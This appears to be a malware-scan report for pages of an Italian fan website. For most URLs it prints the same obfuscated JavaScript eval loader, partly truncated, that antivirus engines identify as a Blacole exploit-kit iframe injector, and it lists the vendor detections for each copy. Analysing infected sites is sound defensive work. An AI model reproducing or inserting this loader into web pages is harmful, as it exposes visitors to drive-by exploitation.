Request | Server response | Status |
http://dqitalia.altervista.org/ | 200 OK Content-Length: 9221 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){w={a:window}.a;v="e".concat(v);}}e=w[""+v];if(1){f=new Array(102,116,108,99,115,103,111,109,30,110,100,118,116,81,95,110,99,109,109,77,115,109,97,99,114,39,39,123,9,30,32,31,30,118,96,112,32,103,103,32,60,30,116,103,103,115,45,113,101,100,98,32,46,30,116,103,103,115,45,79,59,9,30,32,31,30,118,96,112,32,107,109,32,60,30,11
... 3012 bytes are skipped ...111,99,119,46,96,110,112,100,108,100,66,102,105,107,98,40,104,100,114,108,39,59,9,7,9,8,103,102,113,95,109,100,85,97,114,65,114,100,95,116,100,98,32,60,30,116,113,115,101,58,8,32,31,30,32,31,30,32,31,123,10,31,30,32,31,123,99,96,114,99,103,38,101,40,121,105,101,112,97,108,99,87,96,113,67,113,99,97,115,99,100,31,59,32,116,108,100,100,100,105,109,99,100,58,123,10,124,42,32,48,46,48,40,57);}w=f;s=[];for(i=0;-i+1728!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fromCharCode"]((1*w[j]+j%3));} e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.73
- Avast
- JS:Decode-JB [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.COA
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.BlacoleRef.E
- McAfee-GW-Edition
- JS/Exploit-Blacole.jl
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.JS.Iframe.COA
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.jl
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- F-Secure
- Trojan.JS.Iframe.COA
- F-Prot
- JS/IFrame.QW
- AVG
- HTML/Framer.GB
- GData
- Trojan.JS.Iframe.COA
- Commtouch
- JS/IFrame.QW
- BitDefender
- Trojan.JS.Iframe.COA
|
http://codice.shinystat.it/cgi-bin/getcod.cgi?USER=dragonquest | 200 OK Content-Length: 5615 Content-Type: application/x-javascript | clean |
http://www.altervista.org/js_tags/top100.js | 200 OK Content-Length: 578 Content-Type: application/x-javascript | clean |
http://dqitalia.altervista.org/home.php?id=news.htm | 200 OK Content-Length: 20398 Content-Type: text/html | clean |
http://dqitalia.altervista.org/?id=news.htm | 200 OK Content-Length: 9221 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){w={a:window}.a;v="e".concat(v);}}e=w[""+v];if(1){f=new Array(102,116,108,99,115,103,111,109,30,110,100,118,116,81,95,110,99,109,109,77,115,109,97,99,114,39,39,123,9,30,32,31,30,118,96,112,32,103,103,32,60,30,116,103,103,115,45,113,101,100,98,32,46,30,116,103,103,115,45,79,59,9,30,32,31,30,118,96,112,32,107,109,32,60,30,11
... 3012 bytes are skipped ...111,99,119,46,96,110,112,100,108,100,66,102,105,107,98,40,104,100,114,108,39,59,9,7,9,8,103,102,113,95,109,100,85,97,114,65,114,100,95,116,100,98,32,60,30,116,113,115,101,58,8,32,31,30,32,31,30,32,31,123,10,31,30,32,31,123,99,96,114,99,103,38,101,40,121,105,101,112,97,108,99,87,96,113,67,113,99,97,115,99,100,31,59,32,116,108,100,100,100,105,109,99,100,58,123,10,124,42,32,48,46,48,40,57);}w=f;s=[];for(i=0;-i+1728!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fromCharCode"]((1*w[j]+j%3));} e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.73
- Avast
- JS:Decode-JB [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.COA
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.BlacoleRef.E
- McAfee-GW-Edition
- JS/Exploit-Blacole.jl
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.JS.Iframe.COA
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.jl
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- F-Secure
- Trojan.JS.Iframe.COA
- F-Prot
- JS/IFrame.QW
- AVG
- HTML/Framer.GB
- GData
- Trojan.JS.Iframe.COA
- Commtouch
- JS/IFrame.QW
- BitDefender
- Trojan.JS.Iframe.COA
|
http://dqitalia.altervista.org/test404page.js | 404 Not Found Content-Length: 2965 Content-Type: text/html | clean |
http://dqitalia.altervista.org/?id=site/awards.htm | 200 OK Content-Length: 9221 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){w={a:window}.a;v="e".concat(v);}}e=w[""+v];if(1){f=new Array(102,116,108,99,115,103,111,109,30,110,100,118,116,81,95,110,99,109,109,77,115,109,97,99,114,39,39,123,9,30,32,31,30,118,96,112,32,103,103,32,60,30,116,103,103,115,45,113,101,100,98,32,46,30,116,103,103,115,45,79,59,9,30,32,31,30,118,96,112,32,107,109,32,60,30,11
... 3012 bytes are skipped ...111,99,119,46,96,110,112,100,108,100,66,102,105,107,98,40,104,100,114,108,39,59,9,7,9,8,103,102,113,95,109,100,85,97,114,65,114,100,95,116,100,98,32,60,30,116,113,115,101,58,8,32,31,30,32,31,30,32,31,123,10,31,30,32,31,123,99,96,114,99,103,38,101,40,121,105,101,112,97,108,99,87,96,113,67,113,99,97,115,99,100,31,59,32,116,108,100,100,100,105,109,99,100,58,123,10,124,42,32,48,46,48,40,57);}w=f;s=[];for(i=0;-i+1728!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fromCharCode"]((1*w[j]+j%3));} e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.73
- Avast
- JS:Decode-JB [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.COA
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.BlacoleRef.E
- McAfee-GW-Edition
- JS/Exploit-Blacole.jl
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.JS.Iframe.COA
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.jl
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- F-Secure
- Trojan.JS.Iframe.COA
- F-Prot
- JS/IFrame.QW
- AVG
- HTML/Framer.GB
- GData
- Trojan.JS.Iframe.COA
- Commtouch
- JS/IFrame.QW
- BitDefender
- Trojan.JS.Iframe.COA
|
http://dqitalia.altervista.org/?id=site/home.php?id=news.htm | 200 OK Content-Length: 9221 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){w={a:window}.a;v="e".concat(v);}}e=w[""+v];if(1){f=new Array(102,116,108,99,115,103,111,109,30,110,100,118,116,81,95,110,99,109,109,77,115,109,97,99,114,39,39,123,9,30,32,31,30,118,96,112,32,103,103,32,60,30,116,103,103,115,45,113,101,100,98,32,46,30,116,103,103,115,45,79,59,9,30,32,31,30,118,96,112,32,107,109,32,60,30,11
... 3012 bytes are skipped ...111,99,119,46,96,110,112,100,108,100,66,102,105,107,98,40,104,100,114,108,39,59,9,7,9,8,103,102,113,95,109,100,85,97,114,65,114,100,95,116,100,98,32,60,30,116,113,115,101,58,8,32,31,30,32,31,30,32,31,123,10,31,30,32,31,123,99,96,114,99,103,38,101,40,121,105,101,112,97,108,99,87,96,113,67,113,99,97,115,99,100,31,59,32,116,108,100,100,100,105,109,99,100,58,123,10,124,42,32,48,46,48,40,57);}w=f;s=[];for(i=0;-i+1728!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fromCharCode"]((1*w[j]+j%3));} e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.73
- Avast
- JS:Decode-JB [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.COA
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.BlacoleRef.E
- McAfee-GW-Edition
- JS/Exploit-Blacole.jl
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.JS.Iframe.COA
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.jl
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- F-Secure
- Trojan.JS.Iframe.COA
- F-Prot
- JS/IFrame.QW
- AVG
- HTML/Framer.GB
- GData
- Trojan.JS.Iframe.COA
- Commtouch
- JS/IFrame.QW
- BitDefender
- Trojan.JS.Iframe.COA
|
http://dqitalia.altervista.org/?id=site/affiliazione.htm | 200 OK Content-Length: 9221 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){w={a:window}.a;v="e".concat(v);}}e=w[""+v];if(1){f=new Array(102,116,108,99,115,103,111,109,30,110,100,118,116,81,95,110,99,109,109,77,115,109,97,99,114,39,39,123,9,30,32,31,30,118,96,112,32,103,103,32,60,30,116,103,103,115,45,113,101,100,98,32,46,30,116,103,103,115,45,79,59,9,30,32,31,30,118,96,112,32,107,109,32,60,30,11
... 3012 bytes are skipped ...111,99,119,46,96,110,112,100,108,100,66,102,105,107,98,40,104,100,114,108,39,59,9,7,9,8,103,102,113,95,109,100,85,97,114,65,114,100,95,116,100,98,32,60,30,116,113,115,101,58,8,32,31,30,32,31,30,32,31,123,10,31,30,32,31,123,99,96,114,99,103,38,101,40,121,105,101,112,97,108,99,87,96,113,67,113,99,97,115,99,100,31,59,32,116,108,100,100,100,105,109,99,100,58,123,10,124,42,32,48,46,48,40,57);}w=f;s=[];for(i=0;-i+1728!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fromCharCode"]((1*w[j]+j%3));} e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.73
- Avast
- JS:Decode-JB [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.COA
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.BlacoleRef.E
- McAfee-GW-Edition
- JS/Exploit-Blacole.jl
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.JS.Iframe.COA
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.jl
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- F-Secure
- Trojan.JS.Iframe.COA
- F-Prot
- JS/IFrame.QW
- AVG
- HTML/Framer.GB
- GData
- Trojan.JS.Iframe.COA
- Commtouch
- JS/IFrame.QW
- BitDefender
- Trojan.JS.Iframe.COA
|
http://dqitalia.altervista.org/?id=site/banners.htm | 200 OK Content-Length: 9221 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){w={a:window}.a;v="e".concat(v);}}e=w[""+v];if(1){f=new Array(102,116,108,99,115,103,111,109,30,110,100,118,116,81,95,110,99,109,109,77,115,109,97,99,114,39,39,123,9,30,32,31,30,118,96,112,32,103,103,32,60,30,116,103,103,115,45,113,101,100,98,32,46,30,116,103,103,115,45,79,59,9,30,32,31,30,118,96,112,32,107,109,32,60,30,11
... 3012 bytes are skipped ...111,99,119,46,96,110,112,100,108,100,66,102,105,107,98,40,104,100,114,108,39,59,9,7,9,8,103,102,113,95,109,100,85,97,114,65,114,100,95,116,100,98,32,60,30,116,113,115,101,58,8,32,31,30,32,31,30,32,31,123,10,31,30,32,31,123,99,96,114,99,103,38,101,40,121,105,101,112,97,108,99,87,96,113,67,113,99,97,115,99,100,31,59,32,116,108,100,100,100,105,109,99,100,58,123,10,124,42,32,48,46,48,40,57);}w=f;s=[];for(i=0;-i+1728!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fromCharCode"]((1*w[j]+j%3));} e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.73
- Avast
- JS:Decode-JB [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.COA
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.BlacoleRef.E
- McAfee-GW-Edition
- JS/Exploit-Blacole.jl
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.JS.Iframe.COA
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.jl
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- F-Secure
- Trojan.JS.Iframe.COA
- F-Prot
- JS/IFrame.QW
- AVG
- HTML/Framer.GB
- GData
- Trojan.JS.Iframe.COA
- Commtouch
- JS/IFrame.QW
- BitDefender
- Trojan.JS.Iframe.COA
|
http://dqitalia.altervista.org/?id=site/links.htm | 200 OK Content-Length: 9221 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){w={a:window}.a;v="e".concat(v);}}e=w[""+v];if(1){f=new Array(102,116,108,99,115,103,111,109,30,110,100,118,116,81,95,110,99,109,109,77,115,109,97,99,114,39,39,123,9,30,32,31,30,118,96,112,32,103,103,32,60,30,116,103,103,115,45,113,101,100,98,32,46,30,116,103,103,115,45,79,59,9,30,32,31,30,118,96,112,32,107,109,32,60,30,11
... 3012 bytes are skipped ...111,99,119,46,96,110,112,100,108,100,66,102,105,107,98,40,104,100,114,108,39,59,9,7,9,8,103,102,113,95,109,100,85,97,114,65,114,100,95,116,100,98,32,60,30,116,113,115,101,58,8,32,31,30,32,31,30,32,31,123,10,31,30,32,31,123,99,96,114,99,103,38,101,40,121,105,101,112,97,108,99,87,96,113,67,113,99,97,115,99,100,31,59,32,116,108,100,100,100,105,109,99,100,58,123,10,124,42,32,48,46,48,40,57);}w=f;s=[];for(i=0;-i+1728!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fromCharCode"]((1*w[j]+j%3));} e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.73
- Avast
- JS:Decode-JB [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.COA
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.BlacoleRef.E
- McAfee-GW-Edition
- JS/Exploit-Blacole.jl
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.JS.Iframe.COA
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.jl
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- F-Secure
- Trojan.JS.Iframe.COA
- F-Prot
- JS/IFrame.QW
- AVG
- HTML/Framer.GB
- GData
- Trojan.JS.Iframe.COA
- Commtouch
- JS/IFrame.QW
- BitDefender
- Trojan.JS.Iframe.COA
|
http://dqitalia.altervista.org/?id=site/story.htm | 200 OK Content-Length: 9221 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){w={a:window}.a;v="e".concat(v);}}e=w[""+v];if(1){f=new Array(102,116,108,99,115,103,111,109,30,110,100,118,116,81,95,110,99,109,109,77,115,109,97,99,114,39,39,123,9,30,32,31,30,118,96,112,32,103,103,32,60,30,116,103,103,115,45,113,101,100,98,32,46,30,116,103,103,115,45,79,59,9,30,32,31,30,118,96,112,32,107,109,32,60,30,11
... 3012 bytes are skipped ...111,99,119,46,96,110,112,100,108,100,66,102,105,107,98,40,104,100,114,108,39,59,9,7,9,8,103,102,113,95,109,100,85,97,114,65,114,100,95,116,100,98,32,60,30,116,113,115,101,58,8,32,31,30,32,31,30,32,31,123,10,31,30,32,31,123,99,96,114,99,103,38,101,40,121,105,101,112,97,108,99,87,96,113,67,113,99,97,115,99,100,31,59,32,116,108,100,100,100,105,109,99,100,58,123,10,124,42,32,48,46,48,40,57);}w=f;s=[];for(i=0;-i+1728!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fromCharCode"]((1*w[j]+j%3));} e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.73
- Avast
- JS:Decode-JB [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.COA
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.BlacoleRef.E
- McAfee-GW-Edition
- JS/Exploit-Blacole.jl
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.JS.Iframe.COA
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.jl
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- F-Secure
- Trojan.JS.Iframe.COA
- F-Prot
- JS/IFrame.QW
- AVG
- HTML/Framer.GB
- GData
- Trojan.JS.Iframe.COA
- Commtouch
- JS/IFrame.QW
- BitDefender
- Trojan.JS.Iframe.COA
|
http://dqitalia.altervista.org/?id=site/indirizzi.htm | 200 OK Content-Length: 9221 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){w={a:window}.a;v="e".concat(v);}}e=w[""+v];if(1){f=new Array(102,116,108,99,115,103,111,109,30,110,100,118,116,81,95,110,99,109,109,77,115,109,97,99,114,39,39,123,9,30,32,31,30,118,96,112,32,103,103,32,60,30,116,103,103,115,45,113,101,100,98,32,46,30,116,103,103,115,45,79,59,9,30,32,31,30,118,96,112,32,107,109,32,60,30,11
... 3012 bytes are skipped ...111,99,119,46,96,110,112,100,108,100,66,102,105,107,98,40,104,100,114,108,39,59,9,7,9,8,103,102,113,95,109,100,85,97,114,65,114,100,95,116,100,98,32,60,30,116,113,115,101,58,8,32,31,30,32,31,30,32,31,123,10,31,30,32,31,123,99,96,114,99,103,38,101,40,121,105,101,112,97,108,99,87,96,113,67,113,99,97,115,99,100,31,59,32,116,108,100,100,100,105,109,99,100,58,123,10,124,42,32,48,46,48,40,57);}w=f;s=[];for(i=0;-i+1728!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fromCharCode"]((1*w[j]+j%3));} e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.73
- Avast
- JS:Decode-JB [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.COA
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.BlacoleRef.E
- McAfee-GW-Edition
- JS/Exploit-Blacole.jl
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.JS.Iframe.COA
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.jl
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- F-Secure
- Trojan.JS.Iframe.COA
- F-Prot
- JS/IFrame.QW
- AVG
- HTML/Framer.GB
- GData
- Trojan.JS.Iframe.COA
- Commtouch
- JS/IFrame.QW
- BitDefender
- Trojan.JS.Iframe.COA
|
http://dqitalia.altervista.org/?id=site/contatti.htm | 200 OK Content-Length: 9221 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){w={a:window}.a;v="e".concat(v);}}e=w[""+v];if(1){f=new Array(102,116,108,99,115,103,111,109,30,110,100,118,116,81,95,110,99,109,109,77,115,109,97,99,114,39,39,123,9,30,32,31,30,118,96,112,32,103,103,32,60,30,116,103,103,115,45,113,101,100,98,32,46,30,116,103,103,115,45,79,59,9,30,32,31,30,118,96,112,32,107,109,32,60,30,11
... 3012 bytes are skipped ...111,99,119,46,96,110,112,100,108,100,66,102,105,107,98,40,104,100,114,108,39,59,9,7,9,8,103,102,113,95,109,100,85,97,114,65,114,100,95,116,100,98,32,60,30,116,113,115,101,58,8,32,31,30,32,31,30,32,31,123,10,31,30,32,31,123,99,96,114,99,103,38,101,40,121,105,101,112,97,108,99,87,96,113,67,113,99,97,115,99,100,31,59,32,116,108,100,100,100,105,109,99,100,58,123,10,124,42,32,48,46,48,40,57);}w=f;s=[];for(i=0;-i+1728!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fromCharCode"]((1*w[j]+j%3));} e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.73
- Avast
- JS:Decode-JB [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.COA
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.BlacoleRef.E
- McAfee-GW-Edition
- JS/Exploit-Blacole.jl
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.JS.Iframe.COA
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.jl
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- F-Secure
- Trojan.JS.Iframe.COA
- F-Prot
- JS/IFrame.QW
- AVG
- HTML/Framer.GB
- GData
- Trojan.JS.Iframe.COA
- Commtouch
- JS/IFrame.QW
- BitDefender
- Trojan.JS.Iframe.COA
|
http://dqitalia.altervista.org/?id=site/thanks.htm | 200 OK Content-Length: 9221 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){w={a:window}.a;v="e".concat(v);}}e=w[""+v];if(1){f=new Array(102,116,108,99,115,103,111,109,30,110,100,118,116,81,95,110,99,109,109,77,115,109,97,99,114,39,39,123,9,30,32,31,30,118,96,112,32,103,103,32,60,30,116,103,103,115,45,113,101,100,98,32,46,30,116,103,103,115,45,79,59,9,30,32,31,30,118,96,112,32,107,109,32,60,30,11
... 3012 bytes are skipped ...111,99,119,46,96,110,112,100,108,100,66,102,105,107,98,40,104,100,114,108,39,59,9,7,9,8,103,102,113,95,109,100,85,97,114,65,114,100,95,116,100,98,32,60,30,116,113,115,101,58,8,32,31,30,32,31,30,32,31,123,10,31,30,32,31,123,99,96,114,99,103,38,101,40,121,105,101,112,97,108,99,87,96,113,67,113,99,97,115,99,100,31,59,32,116,108,100,100,100,105,109,99,100,58,123,10,124,42,32,48,46,48,40,57);}w=f;s=[];for(i=0;-i+1728!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fromCharCode"]((1*w[j]+j%3));} e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.73
- Avast
- JS:Decode-JB [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.COA
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.BlacoleRef.E
- McAfee-GW-Edition
- JS/Exploit-Blacole.jl
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.JS.Iframe.COA
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.jl
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- F-Secure
- Trojan.JS.Iframe.COA
- F-Prot
- JS/IFrame.QW
- AVG
- HTML/Framer.GB
- GData
- Trojan.JS.Iframe.COA
- Commtouch
- JS/IFrame.QW
- BitDefender
- Trojan.JS.Iframe.COA
|